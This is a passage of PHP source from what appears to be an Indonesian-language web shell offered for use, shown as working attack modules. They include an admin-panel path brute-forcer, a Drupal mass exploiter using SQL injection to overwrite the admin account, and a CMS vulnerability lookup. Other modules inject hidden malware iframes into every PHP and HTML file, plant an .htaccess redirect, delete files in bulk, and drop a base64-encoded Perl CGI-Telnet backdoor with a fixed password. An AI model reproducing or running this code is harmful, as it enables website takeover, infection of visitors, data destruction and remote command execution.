  617.     echo "<font face='courier' color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
  618.     echo "<font face='courier' color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
  619.     echo "<font face='courier' color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
  620.     }
  621.     else{echo "<center><font face='courier' color='red' >".$bda." ----> not infected </font></center>";}
  622.     echo'<center><font face="courier" color=white >----------------------------------------------</font></center>';
  623. }
  624. }
  625. }
  626. elseif ($_GET['666'] == adfin) {
  627. echo "<form action='' method='post'>";
  628. set_time_limit(0);
  629. error_reporting(0);
  630. $list['front'] ="admin
  631. adm
  632. admincp
  633. admcp
  634. cp
  635. modcp
  636. moderatorcp
  637. adminare
  638. admins
  639. cpanel
  640. controlpanel";
  641. $list['end'] = "admin1.php
  642. adm/
  643. _adm_
  644. _admin_
  645. _administrator_
  646. operator
  647. sika
  648. adminweb
  649. develop
  650. ketua
  651. redaktur
  652. author
  653. user
  654. new
  655. newadmin
  656. new/index.php
  657. new/index.html
  658. newadmin/index.php
  659. newadmin/index.html
  660. new/login.php
  661. new/login.html
  662. admin/uploadimage.php
  663. admin/submit.php
  664. admin/uploadbg.php
  665. wp-admin
  666. index.php/admin
  667. index.php/login
  668. index.php/admin.php
  669. index.php/admin.html
  670. index.php/login.php
  671. index.php/login.html
  672. users
  673. dinkesadmin
  674. retel
  675. panel
  676. paneladmin
  677. panellogin
  678. redaksi
  679. cp-admin
  680. Login@web
  681. admin1
  682. admin2
  683. admin3
  684. admin4
  685. admin5
  686. admin6
  687. admin7
  688. admin8
  689. admin9
  690. admin10
  691. master
  692. master/index.php
  693. master/login.php
  694. terasadmin/index.php
  695. terasadmin/login.php
  696. rahasia
  697. rahasia/login.php
  698. rahasia/admin.php
  699. rahasia/index.php
  700. dinkesadmin/login.php
  701. adminpmb
  702. adminpmb/index.php
  703. adminpmb/login.php
  704. system
  705. system/index.php
  706. system/login.php
  707. system/admin.php
  708. webadmin
  709. webadmin/index.php
  710. webadmin/login.php
  711. wpanel
  712. wpanel/index.php
  713. wpanel/login.php
  714. adminpanel
  715. adminpanel/index.php
  716. adminpanel/login.php
  717. adminkec
  718. adminkec/index.php
  719. adminkec/login.php
  720. admindesa
  721. admindesa/index.php
  722. admindesa/login.php
  723. adminkota
  724. adminkota/index.php
  725. adminkota/login.php
  726. admin123
  727. admin123/index.php
  728. admin123/login.php
  729. logout
  730. logout/index.php
  731. logout/login.php
  732. logout/admin.php
  733. adminweb_setting
  734. admin1.html
  735. admin
  736. administrator
  737. admin1.html
  738. admin2.php
  739. admin2.html
  740. yonetim.php
  741. yonetim.html
  742. yonetici.php
  743. yonetici.html
  744. ccms/
  745. ccms/login.php
  746. ccms/index.php
  747. maintenance/
  748. webmaster/
  749. adm/
  750. configuration/
  751. configure/
  752. websvn/
  753. admin/
  754. admin/account.php
  755. admin/account.html
  756. admin/index.php
  757. admin/index.html
  758. admin/login.php
  759. admin/login.html
  760. admin/home.php
  761. admin/controlpanel.html
  762. admin/controlpanel.php
  763. admin.php
  764. admin.html
  765. admin/cp.php
  766. admin/cp.html
  767. cp.php
  768. cp.html
  769. administrator/
  770. administrator/index.html
  771. administrator/index.php
  772. administrator/login.html
  773. administrator/login.php
  774. administrator/account.html
  775. administrator/account.php
  776. administrator.php
  777. administrator.html
  778. login.php
  779. login.html
  780. modelsearch/login.php
  781. moderator.php
  782. moderator.html
  783. moderator/login.php
  784. moderator/login.html
  785. moderator/admin.php
  786. moderator/admin.html
  787. moderator/
  788. account.php
  789. account.html
  790. controlpanel/
  791. controlpanel.php
  792. controlpanel.html
  793. admincontrol.php
  794. admincontrol.html
  795. adminpanel.php
  796. adminpanel.html
  797. admin1.asp
  798. admin2.asp
  799. yonetim.asp
  800. yonetici.asp
  801. admin/account.asp
  802. admin/index.asp
  803. admin/login.asp
  804. admin/home.asp
  805. admin/controlpanel.asp
  806. admin.asp
  807. admin/cp.asp
  808. cp.asp
  809. administrator/index.asp
  810. administrator/login.asp
  811. administrator/account.asp
  812. administrator.asp
  813. login.asp
  814. modelsearch/login.asp
  815. moderator.asp
  816. moderator/login.asp
  817. moderator/admin.asp
  818. account.asp
  819. controlpanel.asp
  820. admincontrol.asp
  821. adminpanel.asp
  822. fileadmin/
  823. fileadmin.php
  824. fileadmin.asp
  825. fileadmin.html
  826. administration/
  827. administration.php
  828. administration.html
  829. sysadmin.php
  830. sysadmin.html
  831. phpmyadmin/
  832. myadmin/
  833. sysadmin.asp
  834. sysadmin/
  835. ur-admin.asp
  836. ur-admin.php
  837. ur-admin.html
  838. ur-admin/
  839. Server.php
  840. Server.html
  841. Server.asp
  842. Server/
  843. wp-admin/
  844. administr8.php
  845. administr8.html
  846. administr8/
  847. administr8.asp
  848. webadmin/
  849. webadmin.php
  850. webadmin.asp
  851. webadmin.html
  852. administratie/
  853. admins/
  854. admins.php
  855. admins.asp
  856. admins.html
  857. administrivia/
  858. Database_Administration/
  859. WebAdmin/
  860. useradmin/
  861. sysadmins/
  862. admin1/
  863. system-administration/
  864. administrators/
  865. pgadmin/
  866. directadmin/
  867. staradmin/
  868. ServerAdministrator/
  869. SysAdmin/
  870. administer/
  871. LiveUser_Admin/
  872. sys-admin/
  873. typo3/
  874. panel/
  875. cpanel/
  876. cPanel/
  877. cpanel_file/
  878. platz_login/
  879. rcLogin/
  880. blogindex/
  881. formslogin/
  882. autologin/
  883. support_login/
  884. meta_login/
  885. manuallogin/
  886. simpleLogin/
  887. loginflat/
  888. utility_login/
  889. showlogin/
  890. memlogin/
  891. members/
  892. login-redirect/
  893. sub-login/
  894. wp-login.php
  895. login1/
  896. dir-login/
  897. login_db/
  898. xlogin/
  899. smblogin/
  900. customer_login/
  901. UserLogin/
  902. login-us/
  903. acct_login/
  904. admin_area/
  905. bigadmin/
  906. project-admins/
  907. phppgadmin/
  908. pureadmin/
  909. sql-admin/
  910. radmind/
  911. openvpnadmin/
  912. wizmysqladmin/
  913. vadmind/
  914. ezsqliteadmin/
  915. hpwebjetadmin/
  916. newsadmin/
  917. adminpro/
  918. Lotus_Domino_Admin/
  919. bbadmin/
  920. vmailadmin/
  921. Indy_admin/
  922. ccp14admin/
  923. irc-macadmin/
  924. banneradmin/
  925. sshadmin/
  926. phpldapadmin/
  927. macadmin/
  928. administratoraccounts/
  929. admin4_account/
  930. admin4_colon/
  931. radmind-1/
  932. Super-Admin/
  933. AdminTools/
  934. cmsadmin/
  935. SysAdmin2/
  936. globes_admin/
  937. cadmins/
  938. phpSQLiteAdmin/
  939. navSiteAdmin/
  940. server_admin_small/
  941. logo_sysadmin/
  942. server/
  943. database_administration/
  944. power_user/
  945. system_administration/
  946. ss_vms_admin_sm/
  947. adminarea/
  948. bb-admin/
  949. adminLogin/
  950. panel-administracion/
  951. instadmin/
  952. memberadmin/
  953. administratorlogin/
  954. admin/admin.php
  955. admin_area/admin.php
  956. admin_area/login.php
  957. siteadmin/login.php
  958. siteadmin/index.php
  959. siteadmin/login.html
  960. admin/admin.html
  961. admin_area/index.php
  962. bb-admin/index.php
  963. bb-admin/login.php
  964. bb-admin/admin.php
  965. admin_area/login.html
  966. admin_area/index.html
  967. admincp/index.asp
  968. admincp/login.asp
  969. admincp/index.html
  970. webadmin/index.html
  971. webadmin/admin.html
  972. webadmin/login.html
  973. admin/admin_login.html
  974. admin_login.html
  975. panel-administracion/login.html
  976. nsw/admin/login.php
  977. webadmin/login.php
  978. admin/admin_login.php
  979. admin_login.php
  980. admin_area/admin.html
  981. pages/admin/admin-login.php
  982. admin/admin-login.php
  983. admin-login.php
  984. bb-admin/index.html
  985. bb-admin/login.html
  986. bb-admin/admin.html
  987. admin/home.html
  988. pages/admin/admin-login.html
  989. admin/admin-login.html
  990. admin-login.html
  991. admin/adminLogin.html
  992. adminLogin.html
  993. home.html
  994. rcjakar/admin/login.php
  995. adminarea/index.html
  996. adminarea/admin.html
  997. webadmin/index.php
  998. webadmin/admin.php
  999. user.html
  1000. modelsearch/login.html
  1001. adminarea/login.html
  1002. panel-administracion/index.html
  1003. panel-administracion/admin.html
  1004. modelsearch/index.html
  1005. modelsearch/admin.html
  1006. admincontrol/login.html
  1007. adm/index.html
  1008. adm.html
  1009. user.php
  1010. panel-administracion/login.php
  1011. wp-login.php
  1012. adminLogin.php
  1013. admin/adminLogin.php
  1014. home.php
  1015. adminarea/index.php
  1016. adminarea/admin.php
  1017. adminarea/login.php
  1018. panel-administracion/index.php
  1019. panel-administracion/admin.php
  1020. modelsearch/index.php
  1021. modelsearch/admin.php
  1022. admincontrol/login.php
  1023. adm/admloginuser.php
  1024. admloginuser.php
  1025. admin2/login.php
  1026. admin2/index.php
  1027. adm/index.php
  1028. adm.php
  1029. affiliate.php
  1030. adm_auth.php
  1031. memberadmin.php
  1032. administratorlogin.php
  1033. admin/admin.asp
  1034. admin_area/admin.asp
  1035. admin_area/login.asp
  1036. admin_area/index.asp
  1037. bb-admin/index.asp
  1038. bb-admin/login.asp
  1039. bb-admin/admin.asp
  1040. pages/admin/admin-login.asp
  1041. admin/admin-login.asp
  1042. admin-login.asp
  1043. user.asp
  1044. webadmin/index.asp
  1045. webadmin/admin.asp
  1046. webadmin/login.asp
  1047. admin/admin_login.asp
  1048. admin_login.asp
  1049. panel-administracion/login.asp
  1050. adminLogin.asp
  1051. admin/adminLogin.asp
  1052. home.asp
  1053. adminarea/index.asp
  1054. adminarea/admin.asp
  1055. adminarea/login.asp
  1056. panel-administracion/index.asp
  1057. panel-administracion/admin.asp
  1058. modelsearch/index.asp
  1059. modelsearch/admin.asp
  1060. admincontrol/login.asp
  1061. adm/admloginuser.asp
  1062. admloginuser.asp
  1063. admin2/login.asp
  1064. admin2/index.asp
  1065. adm/index.asp
  1066. adm.asp
  1067. affiliate.asp
  1068. adm_auth.asp
  1069. memberadmin.asp
  1070. administratorlogin.asp
  1071. siteadmin/login.asp
  1072. siteadmin/index.asp
  1073. ADMIN/
  1074. paneldecontrol/
  1075. login/
  1076. cms/
  1077. admon/
  1078. ADMON/
  1079. administrador/
  1080. superadmin/
  1081. superadmin.php
  1082. ADMIN/login.php
  1083. panelc/
  1084. panel/admin.php
  1085. panel/index.php
  1086. ADMIN/login.html";
  1087. function template() {
  1088. echo '
  1089. <script type="text/javascript">
  1090. <!--
  1091. function insertcode($text, $place, $replace)
  1092. {
  1093.     var $this = $text;
  1094.     var logbox = document.getElementById($place);
  1095.     if($replace == 0)
  1096.         document.getElementById($place).innerHTML = logbox.innerHTML+$this;
  1097.     else
  1098.         document.getElementById($place).innerHTML = $this;
  1099. //document.getElementById("helpbox").innerHTML = $this;
  1100. }
  1101. -->
  1102. </script>
  1103. <div class="mybox" style="text-align:left">
  1104. <h1>Admin Page Finder</h1><hr color="white"><br>
  1105. <div class="wrapper">
  1106. <div class="tube">
  1107. <table class="tabnet"><tr><td>
  1108. <form action="" method="post" name="xploit_form">
  1109.     URL
  1110.     &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="border:0;border-bottom:1px solid #292929; width:500px;" /><br><br>
  1111.     404 string
  1112.     <input type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="border:0;border-bottom:1px solid #292929; width:500px;" /><br><br>
  1113. <input class="kotak" type="submit" style="width: 80px; height: 30px; border-color:white;margin:10px 2px 0 2px;" name="xploit_submit" value=" Scan!" align="center" />
  1114. </form><br>
  1115. <br /></table><hr color="white">
  1116. </div> <!-- /tube -->
  1117. <br />
  1118. <div class="green">
  1119. <div class="tube" id="rightcol">
  1120. Admin Login List: <span id="verified">0</span> / <span id="total">0</span><br />
  1121. <h3 style="color:lime">Nemu!</h3>
  1122. </div> <!-- /tube -->
  1123. </div><!-- /green -->
  1124. <br clear="all" /><br />
  1125. <div class="blue">
  1126. <div class="tube" id="logbox">
  1127. <br />
  1128. <br />
  1129. Admin page Finder :<br /><br />
  1130. </div> <!-- /tube -->
  1131. </div> <!-- /blue -->
  1132. </div> <!-- /wrapper -->
  1133. <br clear="all"><br>';
  1134. }
  1135. function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
  1136.     if($br == 1) $msg .= "<br />";
  1137.     echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
  1138.     if($stop == 1) exit;
  1139.     @flush();@ob_flush();
  1140. }
  1141. function check($x, $front=0) {
  1142.     global $_POST,$site,$false;
  1143.     if($front == 0) $t = $site.$x;
  1144.     else $t = 'http://'.$x.'.'.$site.'/';
  1145.     $headers = get_headers($t);
  1146.     if (!eregi('200', $headers[0])) return 0;
  1147.     $data = @file_get_contents($t);
  1148.     if($_POST['xploit_404string'] == "") if($data == $false) return 0;
  1149.     if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
  1150.     return 1;
  1151. }
  1152.  
  1153. // --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  1154. template();
  1155. if(!isset($_POST['xploit_url'])) die;
  1156. if($_POST['xploit_url'] == '') die;
  1157. $site = $_POST['xploit_url'];
  1158. if ($site[strlen($site)-1] != "/") $site .= "/";
  1159. if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
  1160. $list['end'] = str_replace("\r", "", $list['end']);
  1161. $list['front'] = str_replace("\r", "", $list['front']);
  1162. $pathes = explode("\n", $list['end']);
  1163. $frontpathes = explode("\n", $list['front']);
  1164. show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
  1165. $verificate = 0;
  1166. foreach($pathes as $path) {
  1167.     show('Nge-Cek '.$site.$path.' : ', 0, 0, 'logbox', 0);
  1168.     $verificate++; show($verificate, 0, 0, 'verified', 1);
  1169.     if(check($path) == 0) show('Gak ada', 1, 0, 'logbox', 0);
  1170.     else{
  1171.         show('<span style="color: lime;"><strong>KETEMU!</strong></span>', 1, 0, 'logbox', 0);
  1172.         show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
  1173.     }
  1174. }
  1175. preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
  1176. if(substr($site, 0, 3) == "www") $site = substr($site, 4);
  1177. foreach($frontpathes as $frontpath) {
  1178.     show('Nge-Cek http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
  1179.     $verificate++; show($verificate, 0, 0, 'verified', 1);
  1180.     if(check($frontpath, 1) == 0) show('Gak ada', 1, 0, 'logbox', 0);
  1181.     else{
  1182.         show('<span style="color: lime;"><strong>KETEMU!</strong></span>', 1, 0, 'logbox', 0);
  1183.         show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
  1184.   }
  1185.  
  1186. }
  1187.  
  1188. }
  1189. elseif($_GET['666'] == drupal) {
  1190.     echo "<div class='mybox'>
  1191. <h1>Drupal Mass Exploiter</h1><hr color='white'><br>
  1192. <form method='post' action=''>
  1193. <textarea rows='10'class='mybox' cols='10' name='url'>
  1194. http://www.site.com
  1195. http://www.site2.com</textarea><br><br>
  1196. <input type='submit' class='kotak' style='border-color:white' name='submit' value='SIKAT!'>
  1197. </form>
  1198. </div>
  1199. ";
  1200. $drupal  = ($_GET["drupal"]);
  1201. if($drupal == 'drupal'){
  1202. $filename = $_FILES['file']['name'];
  1203. $filetmp  = $_FILES['file']['tmp_name'];
  1204. echo "<div class='mybox'><form method='POST' enctype='multipart/form-data'>
  1205.    <input type='file'name='file' />
  1206.    <input type='submit' value='drupal !' />
  1207. </form></div>";
  1208. move_uploaded_file($filetmp,$filename);
  1209. }
  1210.     error_reporting(0);
  1211.     if (isset($_POST['submit'])) {
  1212.         function exploit($url) {
  1213.             $post_data = "name[0;update users set name %3D 'cyberscry' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  1214.             $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  1215. ", 'content' => $post_data));
  1216.             $ctx = stream_context_create($params);
  1217.             $data = file_get_contents($url . '/user/login/', null, $ctx);
  1218.             if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
  1219.                 $fp = fopen("exploited.txt", 'a+');
  1220.                 fwrite($fp, "Exploitied  User: cyberscry Pass: cyberscry  =====> {$url}/user/login");
  1221.                 fwrite($fp, "
  1222. ");
  1223.                 fwrite($fp, "--------------------------------------------------------------------------------------------------");
  1224.                 fwrite($fp, "
  1225. ");
  1226.                 fclose($fp);
  1227.                                
  1228.                 echo "<font color='lime'><b>Success:<font color='white'>cyberscry</font> Pass:<font color='white'>cyberscry</font> =><a href='{$url}/user/login' target=_blank ><font color='green'> {$url}/user/login </font></a></font></b><br>";
  1229.             } else {
  1230.                 echo "<font color='red'><b>Failed => {$url}/user/login</font></b><br>";
  1231.             }
  1232.         }
  1233.                
  1234.         $urls = explode("
  1235. ", $_POST['url']);
  1236.         foreach ($urls as $url) {
  1237.             $url = @trim($url);
  1238.             echo exploit($url);
  1239.         }
  1240.     }
  1241.  
  1242. }
  1243. elseif($_GET['666'] == cmsvuln) {
  1244.     @set_time_limit(0);
  1245.     @error_reporting(0);
  1246. // Script Functions , start ..!
  1247. function ask_exploit_db($component){
  1248. $exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  1249. $result = @file_get_contents($exploitdb);
  1250. if (eregi("No results",$result))  {
  1251. echo"<td>Gak ada</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>";
  1252. }else{
  1253. echo"<td><a href='$exploitdb'>Klik Ini..!</a></td><td><--</td></tr>";
  1254. }
  1255. }
  1256. /**************************************************************/
  1257. /* Joomla Conf */
  1258. function get_components($site){
  1259. $source = @file_get_contents($site);
  1260. preg_match_all('{option,(.*?)/}i',$source,$f);
  1261. preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
  1262. preg_match_all('{/components/(.*?)/}i',$source,$f3);
  1263. $arz=array_merge($f2[1],$f[1],$f3[1]);
  1264. $coms=array();
  1265. if(count($arz)==0){ echo "<tr><td style='border-color:white' colspan=3>[~] Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
  1266. foreach(array_unique($arz) as $x){
  1267. $coms[]=$x;
  1268. }
  1269. foreach($coms as $comm){
  1270. echo "<tr><td>$comm</td>";
  1271. ask_exploit_db($comm);
  1272. }
  1273. }
  1274. /**************************************************************/
  1275. /* WP Conf */
  1276. function get_plugins($site){
  1277. $source = @file_get_contents($site);
  1278. preg_match_all("#/plugins/(.*?)/#i", $source, $f);
  1279. $plugins=array_unique($f[1]);
  1280. if(count($plugins)==0){ echo "<tr><td style='border-color:white' colspan=1>[~]  Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
  1281. foreach($plugins as $plugin){
  1282. echo "<tr><td>$plugin</td>";
  1283. ask_exploit_db($plugin);
  1284. }
  1285. }
  1286. /**************************************************************/
  1287. /* Nuke's Conf */
  1288. function get_numod($site){
  1289. $source = @file_get_contents($site);
  1290. preg_match_all('{?name=(.*?)/}i',$source,$f);
  1291. preg_match_all('{?name=(.*?)(&amp;|&|l_op=")}i',$source,$f2);
  1292. preg_match_all('{/modules/(.*?)/}i',$source,$f3);
  1293. $arz=array_merge($f2[1],$f[1],$f3[1]);
  1294. $coms=array();
  1295. if(count($arz)==0){ echo "<tr><td style='border-color:white' colspan=3>[~]  Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
  1296. foreach(array_unique($arz) as $x){
  1297. $coms[]=$x;
  1298. }
  1299. foreach($coms as $nmod){
  1300. echo "<tr><td>$nmod</td>";
  1301. ask_exploit_db($nmod);
  1302. }
  1303. }
  1304. /*****************************************************/
  1305. /* Xoops Conf */
  1306. function get_xoomod($site){
  1307. $source = @file_get_contents($site);
  1308. preg_match_all('{/modules/(.*?)/}i',$source,$f);
  1309. $arz=array_merge($f[1]);
  1310. $coms=array();
  1311. if(count($arz)==0){ echo "<tr><td style='border-color:white' colspan=3>[~]  Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
  1312. foreach(array_unique($arz) as $x){
  1313. $coms[]=$x;
  1314. }
  1315. foreach($coms as $xmod){
  1316. echo "<tr><td>$xmod</td>";
  1317. ask_exploit_db($xmod);
  1318. }
  1319. }
  1320. /**************************************************************/
  1321.  /* Header */
  1322. function t_header($site){
  1323. echo'<br><hr color="white"><br><table align="center" border="1" style="border-color=white; text-align:left;" width="50%" cellspacing="1" cellpadding="5">';
  1324. echo'
  1325. <tr>
  1326. <td style="border-color=white">Site : <a href="'.$site.'">'.$site.'</a></td>
  1327. <td style="border-color=white">Exploit-db</b></td>
  1328. <td style="border-color=white">Exploit it !</td>
  1329. </tr>
  1330. ';
  1331. }
  1332. echo '<div class="mybox" style="text-align:left">
  1333. <h1>CMS Vulnerability Scanner</h1><hr color="white">
  1334. <form method="POST" action=""  class="header-izz">
  1335.     <p>Link&nbsp&nbsp<input type="text" style="border:0;border-bottom:1px solid #292929; width:500px;" name="site" value="http://127.0.0.1/" >
  1336.     <br><br>
  1337.     CMS
  1338.     &nbsp&nbsp&nbsp<select  name="pilihan" style="border:0;border-bottom:1px solid #292929; width:500px;">
  1339.     <option>Wordpress</option>
  1340.     <option>Joomla</option>
  1341.     <option>Nukes</option>
  1342.     <option>Xoops</option>
  1343.     </select><br><br>&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type="submit" style="width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;" value="Sikat" class="kotak"></p>
  1344. </form>';
  1345. // Start Scan :P :P ...
  1346. if($_POST){
  1347. $site=strip_tags(trim($_POST['site']));
  1348. t_header($site);
  1349. echo $x01 = ($_POST['pilihan']=="Wordpress") ? get_plugins($site):"";
  1350. echo $x02 = ($_POST['pilihan']=="Joomla") ? get_components($site):"";
  1351. echo $x03 = ($_POST['pilihan']=="Nuke's") ? get_numod($site):"";
  1352. echo $x04 = ($_POST['pilihan']=="Xoops") ? get_xoomod($site):"";
  1353. }
  1354. exit;
  1355. }
  1356. elseif($_GET['666'] == 'mal')
  1357.     {
  1358. @ini_set('output_buffering', 0); {
  1359. ?>
  1360.     <form action="" method="post">
  1361. <br><center><font size=4>=[ Malware Tools ]=</font><br><br>
  1362. <font color="red">Private Network / Dial Up Modem ,PC Private , ato Home PC / NETWORK</font>&nbsp;(Ojo digawe goblok!!)<br><br>
  1363.     <input class='kotak' type='submit' name='redirect' value="Redirect Search Engine To Malware Site" /></td><td>
  1364.     <input type='submit' class='kotak' name='infect' value="Infect User" /></td><tr></table>
  1365.         <input type='submit' name='code' class='kotak' value="Code Insert" /></td><tr></table>
  1366. </center><br>
  1367.  
  1368. <?php
  1369.         if (isset($_POST['redirect'])) if ($myfile = fopen(".htaccess", 'a')) {
  1370.             fwrite($myfile, gzuncompress(base64_decode($mal)));
  1371.             fwrite($myfile, "
  1372.  
  1373. ");
  1374.             fclose($myfile);
  1375.             ob_end_flush();
  1376.         } else echo "<script>alert('Malware Ga ke kirim Jancookk'); hideAll();</script>";
  1377.     }   if (isset($_POST['infect'])) {
  1378.         $coun = 0;
  1379.         $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=" . $malsite . "> </iframe>";
  1380.         foreach (glob($_GET['dir'] . $directorysperator . "*.php") as $injectj00) {
  1381.             if ($myfile = fopen($injectj00, 'a')) {
  1382.                 fputs($myfile, $str);
  1383.                 fclose($myfile);
  1384.             } else $coun = 1;
  1385.         }
  1386.         foreach (glob($_GET['dir'] . $directorysperator . "*.htm") as $injectj00) {
  1387.             if ($myfile = fopen($injectj00, 'a')) {
  1388.                 fputs($myfile, $str);
  1389.                 fclose($myfile);
  1390.             } else $coun = 1;
  1391.         }
  1392.         foreach (glob($_GET['dir'] . $directorysperator . "*.html") as $injectj00) {
  1393.             if ($myfile = fopen($injectj00, 'a')) {
  1394.                 fputs($myfile, $str);
  1395.                 fclose($myfile);
  1396.             } else $coun = 1;
  1397.         }
  1398.         if ($coun == 0) echo "<script>alert('Malware Infect In user ... DONE...!!!!'); hideAll();</script>";
  1399.         else echo "<script>alert('Malware Ga ke kirim Jancookk'); hideAll();</script>";
  1400.     }
  1401.     if (!isset($_POST['code'])) {
  1402.         if ($file1 = fopen(".htaccess", 'r')) {
  1403.         } else echo "<script>alert('Malware Ga ke kirim Jancookk'); hideAll();</script>";
  1404.     } else {
  1405.         if ($myfile = fopen(".htaccess", 'a')) {
  1406.             fwrite($myfile, $_POST['code']);
  1407.             fwrite($myfile, "
  1408.  
  1409. ");
  1410.             fclose($myfile);
  1411.             ob_end_flush();
  1412.         } else echo "Permission Denied";
  1413.     }
  1414.  
  1415. }
  1416. elseif($_GET['666'] == 'mass_delete') {
  1417.     function hapus_massal($dir,$namafile) {
  1418.         if(is_writable($dir)) {
  1419.             $dira = scandir($dir);
  1420.             foreach($dira as $dirb) {
  1421.                 $dirc = "$dir/$dirb";
  1422.                 $lokasi = $dirc.'/'.$namafile;
  1423.                 if($dirb === '.') {
  1424.                     if(file_exists("$dir/$namafile")) {
  1425.                         unlink("$dir/$namafile");
  1426.                     }
  1427.                 } elseif($dirb === '..') {
  1428.                     if(file_exists("".dirname($dir)."/$namafile")) {
  1429.                         unlink("".dirname($dir)."/$namafile");
  1430.                     }
  1431.                 } else {
  1432.                     if(is_dir($dirc)) {
  1433.                         if(is_writable($dirc)) {
  1434.                             if(file_exists($lokasi)) {
  1435.                                 echo "[<font color=red>DELETED</font>] $lokasi<br>";
  1436.                                 unlink($lokasi);
  1437.                                 $berandal = hapus_massal($dirc,$namafile);
  1438.                             }
  1439.                         }
  1440.                     }
  1441.                 }
  1442.             }
  1443.         }
  1444.     }
  1445.     if($_POST['start']) {
  1446.         echo "<div style='margin: 5px auto; padding: 5px'>";
  1447.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
  1448.         echo "</div>";
  1449.     } else {
  1450.     echo "<center class='mybox'>";
  1451.     echo "<h1>Mass Delete</h1><form method='post'>
  1452.     <font style='text-decoration: underline;'>Folder:</font><br>
  1453.     <input type='text' name='d_dir' value='$dir' style='width: 450px; color:white;' height='10'><br><br>
  1454.     <font style='text-decoration: underline;'>Filename:</font><br>
  1455.     <input type='text' name='d_file' value='index.php' style='width: 450px; color:white;' height='10'><br><br>
  1456.     <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  1457.     </form></center>";
  1458.     }
  1459. }
  1460. elseif($_GET['666'] == 'cgi') {
  1461.  echo "<center/><br/><div class='mybox'>
  1462.  <h1>CGI-Telnet Version 1.3 </h1>
  1463.  Pass: bandungkotasampah<br>";
  1464.  
  1465.  
  1466.     mkdir('cgi2012', 0755);
  1467.     chdir('cgi2012');
  1468.         $kokdosya = ".htaccess";
  1469.         $dosya_adi = "$kokdosya";
  1470.         $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  1471.         $metin = "AddHandler cgi-script .izo";    
  1472.         fwrite ( $dosya , $metin ) ;
  1473.         fclose ($dosya);
  1474. $cgi2012 = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCnVzZSBNSU1FOjpCYXNlNjQ7CiRWZXJzaW9uPSAiQ0dJLVRlbG5ldCBWZXJzaW9uIDEuMyI7CiRFZGl0UGVyc2lvbj0iPGZvbnQgc3R5bGU9J3RleHQtc2hhZG93OiAwcHggMHB4IDZweCByZ2IoMjU1LCAwLCAwKSwgMHB4IDBweCA1cHggcmdiKDMwMCwgMCwgMCksIDBweCAwcHggNXB4IHJnYigzMDAsIDAsIDApOyBjb2xvcjojZmZmZmZmOyBmb250LXdlaWdodDpib2xkOyc+YjM3NGsgLSBDR0ktVGVsbmV0PC9mb250PiI7CgokUGFzc3dvcmQgPSAiYmFuZHVuZ2tvdGFzYW1wYWgiOwkJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4Kc3ViIElzX1dpbigpewoJJG9zID0gJnRyaW0oJEVOVnsiU0VSVkVSX1NPRlRXQVJFIn0pOwoJaWYoJG9zID1+IG0vd2luL2kpewoJCXJldHVybiAxOwoJfQoJZWxzZXsKCQlyZXR1cm4gMDsKCX0KfQokV2luTlQgPSAmSXNfV2luKCk7CQkJCSMgWW91IG5lZWQgdG8gY2hhbmdlIHRoZSB2YWx1ZSBvZiB0aGlzIHRvIDEgaWYKCQkJCQkJCQkjIHlvdSdyZSBydW5uaW5nIHRoaXMgc2NyaXB0IG9uIGEgV2luZG93cyBOVAoJCQkJCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkJCQkJIyBjYW4gbGVhdmUgdGhlIHZhbHVlIGFzIGl0IGlzLgoKJE5UQ21kU2VwID0gIiYiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gV2luZG93cyBOVC4KCiRVbml4Q21kU2VwID0gIjsiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2V